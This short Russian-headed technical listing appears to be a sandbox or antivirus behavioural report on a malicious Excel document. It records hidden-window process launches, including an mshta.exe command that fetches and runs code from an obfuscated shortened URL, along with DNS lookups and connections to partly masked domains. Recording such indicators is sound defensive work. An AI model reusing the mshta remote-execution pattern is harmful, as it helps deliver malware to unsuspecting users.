Техническая информация
- '<SYSTEM32>\ping.exe' 127.0.0.1
- '<SYSTEM32>\mshta.exe' http://12##########91823%12384928198391823@j.mp/hdjksadhjksagbdhkasgdhksagd
- '<SYSTEM32>\calc.exe'
- 'j.#p':80
- 'go#####analytics.com':80
- http://j.#p/static/graphics/bitly_logo_red.svg
- http://j.#p/static/graphics/ProximaNova-Regular.woff2')%20format('woff2'),%20%20%20%20%20%20%20%20url('/static/graphics/ProximaNova-Regular.woff')%20format('woff
- DNS ASK j.#p
- DNS ASK go#####analytics.com
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '<SYSTEM32>\ping.exe' 127.0.0.1' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' http://12##########91823%12384928198391823@j.mp/hdjksadhjksagbdhkasgdhksagd' (со скрытым окном)
- '<SYSTEM32>\calc.exe' ' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\excel.exe' /automation -Embedding